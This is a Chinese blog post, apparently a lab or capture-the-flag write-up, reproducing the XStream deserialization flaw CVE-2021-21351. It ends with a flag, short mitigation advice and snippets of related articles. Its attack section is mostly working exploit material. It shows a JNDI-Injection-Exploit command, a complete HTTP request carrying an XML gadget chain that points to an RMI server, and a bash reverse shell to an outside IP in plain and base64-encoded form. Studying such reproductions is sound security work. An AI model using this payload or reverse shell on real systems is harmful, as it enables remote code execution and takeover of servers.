xstream-cve_2021_21351反序列化漏洞复现

最新推荐文章于 2024-08-08 18:50:50 发布
最新推荐文章于 2024-08-08 18:50:50 发布
阅读量3k 收藏 1
点赞数
文章标签: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whj_study/article/details/122579859
版权

# 漏洞名称: xstream-cve_2021_21351

## 漏洞简介

* Stream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解组时处理的流包含类型信息以重新创建以前编写的对象,XStream 因此基于这些类型信息创建新实例,攻击者可以操纵处理过的输入流并替换或注入对象,从而执行从远程服务器加载的任意代码。

## 影响范围

* Xstream<=1.4.15

## 漏洞复现

* 该漏洞需org.apache.naming.factory.BeanFactory借助EL表达式注入来执行任意命令,使用JNDI-Injection-Exploit工具可以启动JNDI服务器以获得JNDI链接,可以将这些链接插入到你的POC中来测试漏洞,进而代码执行。

* 工具链接:https://github.com/welk1n/JNDI-Injection-Exploit/

* 下载该工具jar文件:https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

* 使用工具执行下面命令:

```java

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/success" -A 192.168.159.238

```

 

* 使用基于SpringBoot利用链的RMI地址作为<dataSource>的值,构造POC如下:

```

POST / HTTP/1.1

Host: 192.168.159.138:63042

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Type: application/xml

Content-Length: 3184

<sorted-set>

  <javax.naming.ldap.Rdn_-RdnEntry>

    <type>ysomap</type>

    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>

      <m__DTMXRTreeFrag>

        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>

          <m__size>-10086</m__size>

          <m__mgrDefault>

            <__overrideDefaultParser>false</__overrideDefaultParser>

            <m__incremental>false</m__incremental>

            <m__source__location>false</m__source__location>

            <m__dtms>

              <null/>

            </m__dtms>

            <m__defaultHandler/>

          </m__mgrDefault>

          <m__shouldStripWS>false</m__shouldStripWS>

          <m__indexing>false</m__indexing>

          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>

            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>

              <javax.sql.rowset.BaseRowSet>

                <default>

                  <concurrency>1008</concurrency>

                  <escapeProcessing>true</escapeProcessing>

                  <fetchDir>1000</fetchDir>

                  <fetchSize>0</fetchSize>

                  <isolation>2</isolation>

                  <maxFieldSize>0</maxFieldSize>

                  <maxRows>0</maxRows>

                  <queryTimeout>0</queryTimeout>

                  <readOnly>true</readOnly>

                  <rowSetType>1004</rowSetType>

                  <showDeleted>false</showDeleted>

                  <dataSource>rmi://192.168.159.238:1099/ldefqm</dataSource>

                  <listeners/>

                  <params/>

                </default>

              </javax.sql.rowset.BaseRowSet>

              <com.sun.rowset.JdbcRowSetImpl>

                <default/>

              </com.sun.rowset.JdbcRowSetImpl>

            </fPullParserConfig>

            <fConfigSetInput>

              <class>com.sun.rowset.JdbcRowSetImpl</class>

              <name>setAutoCommit</name>

              <parameter-types>

                <class>boolean</class>

              </parameter-types>

            </fConfigSetInput>

            <fConfigParse reference='../fConfigSetInput'/>

            <fParseInProgress>false</fParseInProgress>

          </m__incrementalSAXSource>

          <m__walker>

            <nextIsRaw>false</nextIsRaw>

          </m__walker>

          <m__endDocumentOccured>false</m__endDocumentOccured>

          <m__idAttributes/>

          <m__textPendingStart>-1</m__textPendingStart>

          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>

          <m__pastFirstElement>false</m__pastFirstElement>

        </m__dtm>

        <m__dtmIdentity>1</m__dtmIdentity>

      </m__DTMXRTreeFrag>

      <m__dtmRoot>1</m__dtmRoot>

      <m__allowRelease>false</m__allowRelease>

    </value>

  </javax.naming.ldap.Rdn_-RdnEntry>

  <javax.naming.ldap.Rdn_-RdnEntry>

    <type>ysomap</type>

    <value class='com.sun.org.apache.xpath.internal.objects.XString'>

      <m__obj class='string'>test</m__obj>

    </value>

  </javax.naming.ldap.Rdn_-RdnEntry>

</sorted-set>

```

* 抓包,修改数据包

 

* 虽然报错500,但是命令已经成功执行

 

* 反弹shell:

```bash -i >& /dev/tcp/192.168.159.238/9999 0>&1```

* 但是需要将命令进行编码,否则其中的包含空格的参数连带整条命令可能会被JavaStringTokenizer 类所“误解”。

```shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1OS4yMzgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}

```

* 使用工具生成rmi的payload

 

* burpsuite发包,kali获取反弹shell

* flag-{bmh4dc2c379-59bc-4831-a22c-cfb18352fc61}

## 漏洞防范

1. 配置XStream的安全框架为允许的类型使用白名单;

2. 注册自己的转换器,以防止解组当前已知的 Java 运行时关键类型;

3. 升级Xstream到最新版本.

jun91e丶
关注
XStream 反序列化远程命令执行漏洞复现(CVE-2021-21351)
weixin_43223153的博客
03-30 5783
XStream 反序列化远程命令执行漏洞复现 1. 漏洞影响版本 XStream <= 1.4.15 2. 环境搭建 安装漏洞靶场vulhub git clone git://github.com/vulhub/vulhub.git 3. 漏洞复现 1 进入到漏洞环境文件夹,启动漏洞环境。 cd /vulhub/xstream/CVE-2021-21351 docker-compose up -d 2 启动好之后,访问靶机的ip加8080端口 3 下载JNDI注入利用工具: 下载地址:https
CVE-2021-21351-Stream 反序列化命令执行漏洞复现
weixin_59086772的博客
12-02 670
今天雨笋教育小编给大家介绍,XStream是一个简单易用的开源java类库,在解析XML文本时使用黑名单机制来防御反序列化漏洞,但之前的版本黑名单存在缺陷所以造成反序列化命令执行错误,下午具体来看一下复现过程吧。 0x00简介 XStream是一个轻量级、简单易用的开源Java类库, 它主要用于将对象序列化成XML(JSON)或反序列化为对象。 0x01漏洞概述 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞, 但是其 1.4.15 及之前版本黑名单存在缺陷, 攻击者可
XStream 反序列化命令执行漏洞复现CVE-2021-21351
Vitaminapple的博客
04-19 684
XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。
Xstream反序列化漏洞
最新发布
qq_50296568的博客
08-08 738
Xstream库中部分类本身会做反射的 invoke()、序列化的 resovleClass()、readObject()等等,同时这些类的这些操作有被攻击者恶意利用的危险。例如CVE-2020-26217中我们可以通过构造一个包含恶意XML的类。XStream是一个Java库,用于将Java对象序列化为XML格式,也可以将XML格式的数据反序列化Java对象。它是一个流行的开源库,常用于在分布式系统中传输和存储数据。
XStream 反序列化命令执行漏洞CVE-2021-21351
EC_Carrot的博客
08-21 1169
漏洞简介 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。 漏洞复现 由于目标环境Java版本高于8u191,所以我们需要使用org.apache.naming.
CVE-2021-21351 XStream反序列化远程代码执行漏洞
m0_56642842的博客
08-13 2709
0x00 简介 XStreamJava类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。 0x01 漏洞概述 在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解组时处理的流包含类型信息以重新创建以前编写的对
CVE-2021-29505 XStream远程代码执行漏洞复现
m0_56642842的博客
07-29 1998
0x00 简介 XStream是一个常用的Java对象和XML相互转换的工具,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,大大简化了XML序列化工作。 0x01 漏洞概述 XStream官方发布安全更新,修复了多个XStream 反序列化漏洞,其中就包含了CVE-2021-29505。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2021-29505反序列化代码执行漏洞等。漏洞复杂度低,
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
vulhub漏洞复现75_XStream
weixin_44193247的博客
02-13 534
vulhub漏洞复现练习篇
XStream反序列化漏洞(cve-2020-26258/cve-2020-26259)
chaojixiaojingang
12-17 3720
1.漏洞描述 XStream是一个常用的Java对象和XML相互转换的工具。在运行XSteam的服务上,未授权的远程攻击者通过构造特定的序列化数据 ,可造成任意文件删除/服务端请求伪造(SSRF) 。 2.影响版本 XStream <= 1.4.14 3.漏洞POC 1)cve-2020-26259:任意文件删除 import com.thoughtworks.xstream.XStream; /* CVE-2020-26259: XStream is vulnerab...
XStream 反序列化命令执行漏洞CVE-2021-29505)
EC_Carrot的博客
08-21 765
漏洞简介 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求,进而执行任意命令。 漏洞复现 我们需要自己的服务器上使用ysoserial的JRMPListener启动一个恶意的RMI Registry: java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099
XStream 高危漏洞合集,XStream 组件反序列化漏洞
weixin_45314962的博客
11-27 2417
CVE-2021-29505反序列化代码执行漏洞
XStream反序列化漏洞分析
weixin_44825990的博客
11-25 1877
XStream反序列化漏洞分析
XStream反序列化漏洞分析二
weixin_44825990的博客
12-13 922
XStream反序列化流程及CVE-2020-26217漏洞分析
XStream反序列化的坑
H_233的博客
12-10 2890
先附上XStream官方文档和API地址: 官方文档:http://x-stream.github.io/annotations-tutorial.html API文档:http://x-stream.github.io/javadoc/ 我在项目中使用了XStream来完成XML报文与Java Bean的转换操作,Bean序列化没有什么坑,但在反序列化时,遇到了一个较大的坑,踩了挺久。  ...
xstream 反序列化漏洞研究与修复
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
03-17 5230
文章目录1、简介2、举例3、漏洞4、修复 1、简介 xstream是一个用于序列化和反序列化java库,主要是java对象和xml之间相互转换。 XStream反序列化同fastjson这种不一样的地方是fastjson会在反序列化的时候主动去调用getters和setters,而XStream反序列化过程中赋值都有Java的反射机制来完成,所以并没有这样主动调用的特性。 特点 使用方便 - XStream的API提供了一个高层次外观,以简化常用的用例 无需创建映射 - XStream的API提供了默
【WEB安全Xstream最新反序列化poc执行报错问题
HBohan的博客
12-10 1629
最近有个需求,用Xstream反序列化打个内存马,从通用性来讲,肯定用1.4.17的洞去打应用范围最广。众所周知,Xstream官方会提供其漏洞的poc。在我实验之下,1.4.17的几个poc只要涉及到任意java代码执行的都会报错,纯调用java.lang.Runtime.exec()的却不会报错。在我调试之下发现了其奥秘,本文就是解决Xstream任意java代码执行报错的问题。
XStream漏洞编号是 CVE-2021-21351的应对措施
06-11
XStream漏洞编号 CVE-2021-21351 是由于 XStream 序列化时对恶意 XML 转换导致的安全漏洞。以下是一些应对措施: 1. 尽可能升级 XStream 的版本到 1.4.16 或更高版本,因为这些版本已经修复了该漏洞。 2. 如果无法升级到最新版本,可以通过在 XStream 实例中禁用 DTD 解析来缓解此漏洞。可以通过以下代码实现: ``` XStream xstream = new XStream(); xstream.ignoreUnknownElements(); ``` 3. 可以通过限制可反序列化的类或使用安全的转换器来减少攻击面。 4. 将 XStream 序列化作为一个不可信的输入,始终对其进行适当的验证和过滤。 5. 使用其他序列化库,例如 Jackson 或 Gson,来代替 XStream。 以上是一些常见的应对措施,但实际上解决此漏洞的最好方法是升级 XStream 到最新版本。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值